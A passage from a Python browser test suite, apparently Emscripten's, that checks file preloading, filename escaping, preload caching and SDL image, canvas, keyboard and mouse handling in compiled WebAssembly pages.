Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with --save-dir for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'),
args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map'])
@also_with_wasmfs
def test_preload_file(self):
create_file('somefile.txt', 'load me right before running the code please')
create_file('.somefile.txt', 'load me right before running the code please')
create_file('some@file.txt', 'load me right before running the code please')
absolute_src_path = os.path.abspath('somefile.txt')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
# TODO: change this when wasmfs supports relative paths.
if self.get_setting('WASMFS'):
path = "/" + path
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath])
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
create_file(tricky_filename, 'load me right before running the code please')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')])
# TODO: WASMFS doesn't support the rest of this test yet. Exit early.
if self.get_setting('WASMFS'):
return
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path])
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
f = fopen("%s", "r");
assert(f != NULL);
fclose(f);
f = fopen("%s", "r");
assert(f == NULL);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*'])
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY)
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins'])
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
@parameterized({
'default': ([],),
'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],),
})
@requires_threads
def test_preload_file_with_manual_data_download(self, args):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args)
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
# Move .data file out of server root to ensure that getPreloadedPackage is actually used
os.mkdir('test')
shutil.move('manual_download_data.data', 'test/manual_download_data.data')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by
# correctly escaping the names.
def test_output_file_escaping(self):
self.set_setting('EXIT_RUNTIME')
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.abspath(d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
create_file(os.path.join(d, txt), 'load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
create_file(cpp, r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
abs_txt = os.path.join(abs_d, txt)
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.abspath(page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0')
@parameterized({
'0': (0,),
'1mb': (1 * 1024 * 1024,),
'100mb': (100 * 1024 * 1024,),
'150mb': (150 * 1024 * 1024,),
})
def test_preload_caching(self, extra_size):
self.set_setting('EXIT_RUNTIME')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
if is_chrome() and extra_size >= 100 * 1024 * 1024:
self.skipTest('chrome bug')
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-sALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_preload_caching_indexeddb_name(self):
self.set_setting('EXIT_RUNTIME')
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1')
def test_multifile(self):
# a few files inside a directory
ensure_dir('subdirr/moar')
create_file('subdirr/data1.txt', '1214141516171819')
create_file('subdirr/moar/data2.txt', '3.14159265358979')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
assert(strcmp("3.14159265358979", buf) == 0);
return 0;
}
''')
# by individual files
self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt'])
# by directory, and remove files to make sure
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY)
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(Path('subdirr/data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
default_shell = read_file(path_from_root('src/shell.html'))
create_file('shell.html', default_shell.replace('var Module = {', '''
var Module = {
locateFile: function(path, prefix) {
if (path.endsWith(".wasm")) {
return prefix + path;
} else {
return "cdn/" + path;
}
},
'''))
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("1214141516171819", buf) == 0);
return 0;
}
''')
self.set_setting('EXIT_RUNTIME')
self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.data', Path('cdn/test.data'))
self.run_browser('test.html', '', '/report_result?exit:0')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.disableErrorReporting = true;
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
@also_with_wasmfs
def test_dev_random(self):
self.btest_exit(Path('filesystem/dev_random.cpp'))
def test_sdl_swsurface(self):
self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL'])
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.btest_exit(src, args=[
'-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
@also_with_wasmfs
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.btest_exit(src, args=[
'-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
@parameterized({
'': ([],),
# add testing for closure on preloaded files + ENVIRONMENT=web (we must not
# emit any node.js code here, see
# https://github.com/emscripten-core/emscripten/issues/14486
'closure_webonly': (['--closure', '1', '-sENVIRONMENT=web'],)
})
def test_sdl_image_prepare_data(self, args):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest_exit('sdl_stb_image_cleanup.c', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O0', '-sSAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O2', '-sSAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-sGL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-sASSERTIONS', '-sSAFE_HEAP', '-sASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest_exit('canvas_focus.c')
def test_keydown_preventdefault_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-sEXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest_exit('glut_touchevents.c', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest_exit('glut_wheelevents.c', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL'])
self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
